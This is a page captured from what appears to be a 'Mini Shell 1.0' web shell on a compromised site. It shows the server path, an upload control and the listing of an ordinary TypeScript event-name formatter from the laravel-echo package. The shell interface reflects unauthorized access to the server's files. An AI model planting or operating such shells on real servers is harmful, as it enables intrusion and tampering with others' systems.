HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/var/www/devs.lapieza.net/node_modules/laravel-echo/src/util/
Upload File :
Current File : //proc/self/root/var/www/devs.lapieza.net/node_modules/laravel-echo/src/util/event-formatter.ts
/**
 * Event name formatter
 */
export class EventFormatter {
    /**
     * Create a new class instance.
     */
    constructor(private namespace: string | boolean) {
        //
    }

    /**
     * Format the given event name.
     */
    format(event: string): string {
        if (['.', '\\'].includes(event.charAt(0))) {
            return event.substring(1);
        } else if (this.namespace) {
            event = this.namespace + '.' + event;
        }

        return event.replace(/\./g, '\\');
    }

    /**
     * Set the event namespace.
     */
    setNamespace(value: string | boolean): void {
        this.namespace = value;
    }
}